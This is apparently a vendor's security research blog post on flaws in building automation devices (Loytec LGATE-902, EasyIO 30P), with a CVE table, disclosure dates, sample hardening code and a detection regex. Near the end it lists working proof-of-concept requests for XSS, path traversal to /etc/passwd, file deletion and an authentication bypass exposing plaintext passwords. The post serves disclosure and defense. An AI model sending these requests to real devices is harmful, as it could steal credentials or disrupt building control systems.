It is well known that cyber security is a constant game of cat and mouse, where both attackers and defenders are constantly evolving. Although we spend most of our time on the defensive side, part of our research activities involves thinking like an attacker to better defend the networks of our customers. This is useful not only to understand and defeat current Tactics, Techniques and Procedures (TTPs) used by real-world malicious actors, but also to anticipate future threats.
For the past months, the OT Research team at ForeScout performed an exercise in vulnerability and malware research for devices commonly used in BAS networks. Our goal was to create a proof-of-concept malware targeting building automation networks to raise awareness about a problem that we believe will become increasingly serious in the coming years. Although we haven’t yet seen malware specially crafted for smart buildings, malicious software targeting Industrial Control Systems (ICS) has seen enormous growth in the past decade (see, e.g., Industroyer, TRITON, and the more recent GreyEnergy). These attacks can be devastating and we believe that malware targeting smart buildings is an inevitable next step.
The main results of our research efforts were reported in a whitepaper and presented at the recent S4x19 conference. These results include:
- an analysis of the security landscape for building automation systems and networks;
- the discovery and responsible disclosure of previously unknown vulnerabilities in building automation devices;
- the development of a proof-of-concept malware that persists on devices at the automation level; and
- a discussion on how SilentDefense can help in protecting Building Automation Systems by promptly detecting threats.
The malware described in the whitepaper uses both new vulnerabilities found by our team (e.g., buffer overflow, hardcoded secrets, and severe device misconfigurations) and recent vulnerabilities found by others. In the whitepaper, we highlight the increased attack surface due to the introduction of IoT devices in building automation networks; detail attack scenarios that can be used by malware to disrupt such networks; and outline the consequences of such an attack on two critical subsystems of many facilities:
- HVAC: changing temperature setpoints or crashing devices used for heating, ventilation, and air conditioning (HVAC) can take offline data centers used by large companies to store and process sensitive data (e.g., financial information), as well as harm people in facilities where these devices are vital, such as tunnels and mines; and
- Physical Access Control: these systems are used to grant or deny access to certain areas of a building in places such as office spaces, but also in critical facilities such as airports and hospitals. An attacker who has access to the automation network of these buildings could control the doors to gain access to forbidden areas or deny access to otherwise authorized personnel.
In this post, we want to highlight some of the vulnerabilities found during the research and development of the malware. We divided these vulnerabilities into two groups:
- two high severity vulnerabilities that were used in the malware; and
- five vulnerabilities affecting other vendors that were not used in the final attack because they were out of scope for the attack path that we implemented and because most of them have low severity in the context of a BAS.
1. High severity vulnerabilities
These vulnerabilities allow a remote attacker to execute arbitrary code on the target device (a common access control PLC) and gain complete control of it. When we contacted the vendor about these issues, they informed us that the issues were already known and patched, but they were never publicly disclosed. Therefore, we keep the vendor and affected device anonymous, but give some details on the vulnerabilities:
- hardcoded secret: we found an encryption function using a hardcoded secret to store user passwords. This weakness allows an attacker to obtain the credentials of valid users of the device.
- buffer overflow: we found a buffer overflow leading to remote code execution on the PLC, which allows an attacker to take full control of the device.
More details on these vulnerabilities are reported in the whitepaper.
Even if these two issues are not 0-days in the proper sense (since they were known to the vendor and a patch existed for them) and they affect older versions of the framework used in the Access Control PLC (the versions we tested were from June 2013), they are very serious for at least one reason, which is common to ICS, IoT, and BAS devices: the myriad of devices available online (and probably many more not directly exposed) that can still be exploited because they are unpatched (see the conclusion of this post).
2. Lower severity vulnerabilities
The vulnerabilities found by our team are summarized in the table below. Each discovered vulnerability was reported to the responsible vendor and subsequently patched, as shown in the Notes column.
These vulnerabilities affect the web services that run on two BAS devices and that are used to manage them either from the internal network or even remotely. They all result from improper sanitization of output, e.g., Cross-site Scripting (XSS), or improper validation of user input, e.g., path traversal and authentication bypass.
Product | CVE | Vulnerability Type | Notes
Loytec LGATE-902 | CVE-2018-14919 | XSS | Patched on 13 November 2018
Loytec LGATE-902 | CVE-2018-14918 | Path traversal | Patched on 13 November 2018
Loytec LGATE-902 | CVE-2018-14916 | Arbitrary file deletion | Patched on 13 November 2018
EasyIO 30P | CVE-2018-15820 | XSS | Patched on 8 October 2018
EasyIO 30P | CVE-2018-15819 | Authentication bypass | Patched on 8 October 2018
The vulnerabilities on the Loytec device (CVE-2018-14919, CVE-2018-14918, and CVE-2018-14916) were disclosed to the vendor on 26th July, 2018; acknowledged by the vendor on 1st August, 2018; and patched on 13th November, 2018. The vulnerabilities on the EasyIO device were disclosed to the vendor on 3rd August, 2018; acknowledged by the vendor on 22nd August, 2018; and patched on 8th October, 2018.
The XSS vulnerabilities (CVE-2018-14919, CVE-2018-15820) allow an attacker to inject malicious scripts into trusted web interfaces running on the vulnerable devices, which may be executed by the browser of an unsuspecting device administrator to access cookies, session tokens, or other sensitive information, as well as to perform malicious actions on behalf of the user. Besides accessing sensitive information, XSS attacks can be used for, e.g., internal network discovery and traffic tunneling using tools such as BeEF. Stored XSS allows an attacker to store the malicious script in the application, potentially executing it for every user that accesses the application. Reflected XSS, on the other hand, allows the attacker to send a non-persistent request containing the malicious script to a targeted user.
The path traversal and file deletion vulnerabilities (CVE-2018-14918 and CVE-2018-14916) allow an attacker to manipulate path references and access or delete files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read or delete system and configuration files containing, e.g., usernames and passwords.
The authentication bypass vulnerability (CVE-2018-15819) allows an attacker to execute privileged requests in the vulnerable application without possessing valid credentials, by manipulating the session identifier sent in the request. Any string of the same size as a valid identifier is accepted. In this specific instance, the attacker can even steal the credential information of application users, including plaintext passwords (see the proof-of-concept below).
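As an added illustration (not code from either vendor), the following Python shows the two input-validation failures just described, a session check that only inspects the identifier's length and an unconstrained file path, each beside a hardened check. The session store, the 48-character token length (taken from the PoC identifier) and the function names are assumptions of this example; the documentation folder is the one named in the PoC URL.

```python
import hmac
import os
import secrets
from typing import Optional

# Constructed server-side session store: token -> user.  token_hex(24)
# yields 48 hex characters, the identifier length seen in the PoC URL.
SESSIONS = {secrets.token_hex(24): "admin"}
TOKEN_LEN = 48


def session_valid_weak(token: str) -> bool:
    """Mimics the CVE-2018-15819 flaw: only the identifier's length is
    checked, so any 48-character string is treated as a live session."""
    return len(token) == TOKEN_LEN


def session_valid(token: str) -> bool:
    """Hardened: the identifier must match an entry in the server-side
    session store; compare_digest avoids timing leaks on each comparison."""
    return any(hmac.compare_digest(token, known) for known in SESSIONS)


# Folder the documentation endpoint is meant to serve from (see PoC URL).
WEB_ROOT = os.path.realpath("/var/www/documentation")


def resolve_path_weak(user_path: str) -> str:
    """Mimics the path-traversal flaw: the caller-supplied path is only
    normalised, so '..' segments walk out of the documentation folder."""
    return os.path.normpath(user_path)


def resolve_path(user_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Hardened: canonicalise first (collapsing '..' and symlinks), then
    accept the result only if it is the root itself or lies beneath it."""
    candidate = os.path.realpath(user_path)
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None
```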
Since all of these vulnerabilities were patched a few months ago, below we present simple proof-of-concept (PoC) exploits for them. All the PoCs are requests to the web application running on a device with network address <dev_addr>.
CVE-2018-14919 Proof-of-concept
- Display an alert dialog (stored XSS):
POST http://<dev_addr>/webui/config/doc/action
save=1&update=1&data=[["test","</script><script>alert(1);</script>",2]]
- Display an alert dialog (reflected XSS):
http://<dev_addr>/webui/data/alarm_log_obj?handle=1000%27-alert(1)-%27&page=0
CVE-2018-14918 Proof-of-concept
- Read the /etc/passwd file containing usernames and hashed passwords:
http://<dev_addr>/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
CVE-2018-14916 Proof-of-concept
- Delete a file test.txt stored in the directory above the web application:
POST http://<dev_addr>/webui/config/doc/action
delete=1&update=1&name=../test.txt
CVE-2018-15820 Proof-of-concept
- Display an alert dialog:
POST http://<dev_addr>/EASYIO30P-<session_token>/dev.htm
GDN=...'onMouseOver='alert(1);&GDG=Group&GDL=Location
CVE-2018-15819 Proof-of-concept
- Access the webuser.js file containing plaintext passwords:
http://<dev_addr>/EASYIO30P-123456789012345678901234567890123456789012345678/webuser.js
Conclusion
The fact that these kinds of vulnerabilities, which are simple to find and fix but also very simple to exploit, are still present in devices potentially used in critical buildings is alarming. The results of this research highlight the need for an efficient network security monitoring solution like SilentDefense.
Another worrying fact is that these vulnerable devices can be found remotely accessible with publicly reachable network addresses using search engines such as Shodan and Censys. Using these search engines, we found 279 instances of the two devices mentioned in the table of low severity vulnerabilities (or similar devices from the same manufacturers, using the same vulnerable software), out of which 214 (76%) were potentially vulnerable. We also found 21621 instances of devices like the access control PLC mentioned in the high severity issues, out of which 7980 (37%) were potentially vulnerable. Unfortunately, many of these devices seem to be located in hospitals and schools (given the information displayed in the banners captured by the search engines).
Besides the vulnerabilities reported here, we also found severe misconfigurations on a second-hand workstation used to manage building automation devices, which allowed us to obtain remote code execution and finally administrator privileges on the running operating system. In this case, the vendor claimed that these issues were introduced by the integrator.
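As an added example of the monitoring the conclusion calls for (not part of the original post and not SilentDefense's own logic), the following Python flags the request patterns from the PoC section when run over decoded HTTP requests. The record format, the `dev` host and the rule names are assumptions of this example; the sample records are constructed to mirror the PoC requests plus one benign request.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus, urlsplit

# Constructed request records, "<method> <url> <body>" (body empty for GET).
# The first five mirror the PoC requests above; the last one is benign.
SAMPLE_REQUESTS = [
    'POST http://dev/webui/config/doc/action save=1&update=1&data=[["test","</script><script>alert(1);</script>",2]]',
    "GET http://dev/webui/data/alarm_log_obj?handle=1000%27-alert(1)-%27&page=0 ",
    "GET http://dev/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 ",
    "POST http://dev/webui/config/doc/action delete=1&update=1&name=../test.txt",
    "POST http://dev/EASYIO30P-<session_token>/dev.htm GDN=...'onMouseOver='alert(1);&GDG=Group&GDL=Location",
    "GET http://dev/webui/data/alarm_log_obj?handle=1000&page=0 ",
]

# Each rule is applied to the URL-decoded query string and body together.
RULES = [
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("xss-script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("xss-event-handler", re.compile(r"""['"]\s*on\w+\s*=""", re.I)),
    ("xss-js-call", re.compile(r"\balert\s*\(", re.I)),
]


def classify(record: str) -> List[str]:
    """Return the sorted names of the rules a single request record trips."""
    _method, url, body = record.split(" ", 2)
    # Decode percent-encoding first so '%27' and friends cannot hide a payload.
    text = unquote_plus(urlsplit(url).query) + " " + unquote_plus(body)
    return sorted(name for name, rx in RULES if rx.search(text))


def scan(records: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (index, findings) for every record that trips at least one rule."""
    hits = []
    for i, rec in enumerate(records):
        findings = classify(rec)
        if findings:
            hits.append((i, findings))
    return hits


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_REQUESTS):
        print(f"request {i}: {', '.join(findings)}")
```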